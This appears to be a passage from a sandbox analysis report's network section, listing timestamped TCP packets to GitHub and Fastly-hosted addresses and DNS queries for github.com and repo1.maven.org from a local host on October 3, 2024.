                                      Oct 3, 2024 09:26:10.591509104 CEST44349778199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:10.591695070 CEST49778443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:10.594006062 CEST49778443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:10.594027042 CEST44349778199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:10.594361067 CEST49778443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:10.594386101 CEST44349778199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:10.594440937 CEST49778443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:11.566056013 CEST49779443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:11.566127062 CEST44349779140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:11.566265106 CEST49779443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:11.566967010 CEST49779443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:11.566987038 CEST44349779140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:12.232820988 CEST44349779140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:12.232988119 CEST49779443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:12.234246969 CEST49779443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:12.234266043 CEST44349779140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:12.234365940 CEST49779443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:12.234436035 CEST44349779140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:12.234486103 CEST49779443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:15.472647905 CEST49780443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.472697020 CEST44349780199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:15.472805977 CEST49780443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.474291086 CEST49780443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.474304914 CEST44349780199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:15.565665007 CEST49781443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.565710068 CEST44349781199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:15.565788031 CEST49781443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.566447973 CEST49781443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.566464901 CEST44349781199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:15.581444025 CEST49782443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.581459999 CEST44349782199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:15.581526995 CEST49782443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.582011938 CEST49782443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:15.582022905 CEST44349782199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.035701990 CEST44349780199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.035875082 CEST49780443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.037497997 CEST49780443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.037513018 CEST44349780199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.037655115 CEST49780443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.037914038 CEST44349780199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.037992001 CEST49780443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.134241104 CEST44349781199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.134311914 CEST49781443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.135657072 CEST49781443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.135680914 CEST44349781199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.135776997 CEST49781443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.135873079 CEST44349781199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.135919094 CEST49781443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.187680960 CEST44349782199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.187817097 CEST49782443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.188741922 CEST49782443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.188764095 CEST44349782199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.188864946 CEST49782443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:16.188946009 CEST44349782199.232.196.209192.168.2.5
                                      Oct 3, 2024 09:26:16.188992023 CEST49782443192.168.2.5199.232.196.209
                                      Oct 3, 2024 09:26:17.238239050 CEST49783443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:17.238291025 CEST44349783140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:17.238392115 CEST49783443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:17.239017963 CEST49783443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:17.239028931 CEST44349783140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:17.863403082 CEST44349783140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:17.863538980 CEST49783443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:17.885574102 CEST49783443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:17.885601044 CEST44349783140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:17.885850906 CEST44349783140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:17.885904074 CEST49783443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:17.889265060 CEST49783443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:17.889285088 CEST44349783140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:21.060903072 CEST49784443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.060951948 CEST44349784199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.061017036 CEST49784443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.061558008 CEST49784443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.061580896 CEST44349784199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.128290892 CEST49785443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.128340006 CEST44349785199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.128412962 CEST49785443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.128890991 CEST49785443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.128902912 CEST44349785199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.175493002 CEST49786443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.175528049 CEST44349786199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.175605059 CEST49786443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.176198959 CEST49786443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.176209927 CEST44349786199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.516959906 CEST44349784199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.517194986 CEST49784443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.519747019 CEST49784443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.519767046 CEST44349784199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.519913912 CEST44349784199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.519989014 CEST49784443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.520291090 CEST49784443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.520308971 CEST44349784199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.597876072 CEST44349785199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.598022938 CEST49785443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.600610971 CEST49785443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.600621939 CEST44349785199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.600807905 CEST44349785199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.600886106 CEST49785443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.601003885 CEST49785443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.601023912 CEST44349785199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.659276009 CEST44349786199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.659693956 CEST49786443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.660597086 CEST49786443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.660604954 CEST44349786199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.660729885 CEST49786443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:21.660736084 CEST44349786199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.660746098 CEST44349786199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.871413946 CEST44349786199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:21.871473074 CEST49786443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:22.904364109 CEST49787443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:22.904409885 CEST44349787140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:22.904593945 CEST49787443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:22.905145884 CEST49787443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:22.905163050 CEST44349787140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:23.553406954 CEST44349787140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:23.553596973 CEST49787443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:23.554563999 CEST49787443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:23.554575920 CEST44349787140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:23.554676056 CEST49787443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:23.554737091 CEST44349787140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:23.554821968 CEST49787443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:26.534524918 CEST49788443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.534571886 CEST44349788199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:26.534665108 CEST49788443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.535209894 CEST49788443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.535226107 CEST44349788199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:26.612797976 CEST49789443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.612858057 CEST44349789199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:26.612957001 CEST49789443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.613579988 CEST49789443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.613604069 CEST44349789199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:26.675152063 CEST49790443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.675210953 CEST44349790199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:26.675292015 CEST49790443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.675815105 CEST49790443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:26.675839901 CEST44349790199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.136780977 CEST44349788199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.136897087 CEST49788443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.137851954 CEST49788443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.137868881 CEST44349788199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.137967110 CEST49788443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.138067007 CEST44349788199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.138123035 CEST49788443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.184792995 CEST44349789199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.184875965 CEST49789443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.185849905 CEST49789443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.185858011 CEST44349789199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.185980082 CEST49789443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.186043978 CEST44349789199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.186095953 CEST49789443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.268934011 CEST44349790199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.269027948 CEST49790443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.269905090 CEST49790443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.269931078 CEST44349790199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.269978046 CEST49790443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:27.270354033 CEST44349790199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:27.270425081 CEST49790443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:28.550422907 CEST49791443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:28.550486088 CEST44349791140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:28.550681114 CEST49791443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:28.551490068 CEST49791443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:28.551512003 CEST44349791140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:29.191490889 CEST44349791140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:29.191572905 CEST49791443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:29.192630053 CEST49791443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:29.192642927 CEST44349791140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:29.192739010 CEST49791443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:29.192845106 CEST44349791140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:29.192895889 CEST49791443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:32.144113064 CEST49792443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.144177914 CEST44349792199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.144278049 CEST49792443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.144815922 CEST49792443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.144835949 CEST44349792199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.175318003 CEST49793443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.175374985 CEST44349793199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.175447941 CEST49793443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.175992012 CEST49793443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.176014900 CEST44349793199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.285680056 CEST49794443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.285721064 CEST44349794199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.285797119 CEST49794443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.286359072 CEST49794443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.286367893 CEST44349794199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.615039110 CEST44349792199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.615180969 CEST49792443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.616204977 CEST49792443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.616213083 CEST44349792199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.616358995 CEST49792443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.616365910 CEST44349792199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.616379023 CEST44349792199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.616408110 CEST49792443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.627378941 CEST44349793199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.627510071 CEST49793443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.628659010 CEST49793443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.628674030 CEST44349793199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.628753901 CEST49793443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.628801107 CEST44349793199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.628846884 CEST49793443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.845896959 CEST44349794199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.846137047 CEST49794443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.847306967 CEST49794443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.847323895 CEST44349794199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.847450018 CEST49794443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:32.847631931 CEST44349794199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:32.847695112 CEST49794443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:34.190952063 CEST49795443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:34.191008091 CEST44349795140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:34.191096067 CEST49795443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:34.191693068 CEST49795443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:34.191730022 CEST44349795140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:34.812896013 CEST44349795140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:34.812980890 CEST49795443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:34.814110041 CEST49795443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:34.814121962 CEST44349795140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:34.814234972 CEST49795443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:34.814304113 CEST44349795140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:34.814383030 CEST49795443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:37.628278017 CEST49796443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.628338099 CEST44349796199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:37.628453970 CEST49796443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.629077911 CEST49796443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.629089117 CEST44349796199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:37.643846035 CEST49797443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.643893957 CEST44349797199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:37.643970013 CEST49797443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.644416094 CEST49797443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.644434929 CEST44349797199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:37.862752914 CEST49798443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.862808943 CEST44349798199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:37.862920046 CEST49798443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.863403082 CEST49798443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:37.863420010 CEST44349798199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.090186119 CEST44349796199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.090357065 CEST49796443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.091583014 CEST49796443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.091593027 CEST44349796199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.091732025 CEST49796443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.091762066 CEST44349796199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.091810942 CEST49796443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.098579884 CEST44349797199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.098685026 CEST49797443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.099442005 CEST49797443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.099458933 CEST44349797199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.099570036 CEST49797443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.099886894 CEST44349797199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.099961042 CEST49797443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.414992094 CEST44349798199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.415129900 CEST49798443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.416053057 CEST49798443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.416066885 CEST44349798199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.416157961 CEST49798443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:38.416290998 CEST44349798199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:38.416347980 CEST49798443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:39.800266027 CEST49799443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:39.800373077 CEST44349799140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:39.800522089 CEST49799443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:39.801043987 CEST49799443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:39.801076889 CEST44349799140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:40.421293020 CEST44349799140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:40.421547890 CEST49799443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:40.424455881 CEST49799443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:40.424468040 CEST44349799140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:40.424629927 CEST44349799140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:40.424678087 CEST49799443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:40.424777031 CEST49799443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:40.424793005 CEST44349799140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:43.081701994 CEST49800443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.081743002 CEST44349800199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.081829071 CEST49800443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.082396984 CEST49800443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.082410097 CEST44349800199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.096990108 CEST49801443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.097024918 CEST44349801199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.097115993 CEST49801443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.097605944 CEST49801443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.097615004 CEST44349801199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.425441980 CEST49802443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.425487995 CEST44349802199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.425554037 CEST49802443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.427628994 CEST49802443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.427649975 CEST44349802199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.628777027 CEST44349800199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.628937006 CEST49800443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.630119085 CEST49800443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.630129099 CEST44349800199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.630227089 CEST49800443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.630315065 CEST44349800199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.630367994 CEST49800443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.654999971 CEST44349801199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.655215979 CEST49801443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.656362057 CEST49801443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.656375885 CEST44349801199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.656526089 CEST44349801199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.656553984 CEST49801443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:43.656562090 CEST44349801199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:43.656685114 CEST49801443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:44.004384041 CEST44349802199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:44.004549026 CEST49802443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:44.005495071 CEST49802443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:44.005525112 CEST44349802199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:44.005640984 CEST49802443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:44.005713940 CEST44349802199.232.192.209192.168.2.5
                                      Oct 3, 2024 09:26:44.005764961 CEST49802443192.168.2.5199.232.192.209
                                      Oct 3, 2024 09:26:45.425545931 CEST49803443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:45.425604105 CEST44349803140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:45.425739050 CEST49803443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:45.426639080 CEST49803443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:45.426657915 CEST44349803140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:46.055495977 CEST44349803140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:46.055819988 CEST49803443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:46.635807991 CEST49803443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:46.635833025 CEST44349803140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:46.635881901 CEST49803443192.168.2.5140.82.121.4
                                      Oct 3, 2024 09:26:46.636220932 CEST44349803140.82.121.4192.168.2.5
                                      Oct 3, 2024 09:26:46.636301994 CEST49803443192.168.2.5140.82.121.4

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 3, 2024 09:24:40.819242001 CEST6329253192.168.2.51.1.1.1
                                      Oct 3, 2024 09:24:40.819658995 CEST6462553192.168.2.51.1.1.1
                                      Oct 3, 2024 09:24:40.826698065 CEST53632921.1.1.1192.168.2.5
                                      Oct 3, 2024 09:24:40.826709986 CEST53646251.1.1.1192.168.2.5
                                      Oct 3, 2024 09:25:14.004215956 CEST5679253192.168.2.51.1.1.1
                                      Oct 3, 2024 09:25:14.826442003 CEST53567921.1.1.1192.168.2.5
                                      Oct 3, 2024 09:25:14.910373926 CEST5446353192.168.2.51.1.1.1
                                      Oct 3, 2024 09:25:14.917489052 CEST53544631.1.1.1192.168.2.5
                                      Oct 3, 2024 09:25:47.832150936 CEST5340053192.168.2.51.1.1.1
                                      Oct 3, 2024 09:25:47.839844942 CEST53534001.1.1.1192.168.2.5
                                      Oct 3, 2024 09:25:48.801955938 CEST5069853192.168.2.51.1.1.1
                                      Oct 3, 2024 09:25:48.808973074 CEST53506981.1.1.1192.168.2.5
                                      Oct 3, 2024 09:26:21.050426006 CEST6214953192.168.2.51.1.1.1
                                      Oct 3, 2024 09:26:21.059570074 CEST53621491.1.1.1192.168.2.5
                                      Oct 3, 2024 09:26:22.894967079 CEST5101253192.168.2.51.1.1.1
                                      Oct 3, 2024 09:26:22.902323961 CEST53510121.1.1.1192.168.2.5

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 3, 2024 09:24:40.819242001 CEST192.168.2.51.1.1.10x9d91Standard query (0)github.comA (IP address)IN (0x0001)false
                                      Oct 3, 2024 09:24:40.819658995 CEST192.168.2.51.1.1.10xda51Standard query (0)repo1.maven.orgA (IP address)IN (0x0001)false
                                      Oct 3, 2024 09:25:14.004215956 CEST192.168.2.51.1.1.10x44a5Standard query (0)repo1.maven.orgA (IP address)IN (0x0001)false
                                      Oct 3, 2024 09:25:14.910373926 CEST192.168.2.51.1.1.10xf542Standard query (0)github.comA (IP address)IN (0x0001)false
                                      Oct 3, 2024 09:25:47.832150936 CEST192.168.2.51.1.1.10xa10dStandard query (0)repo1.maven.orgA (IP address)IN (0x0001)false
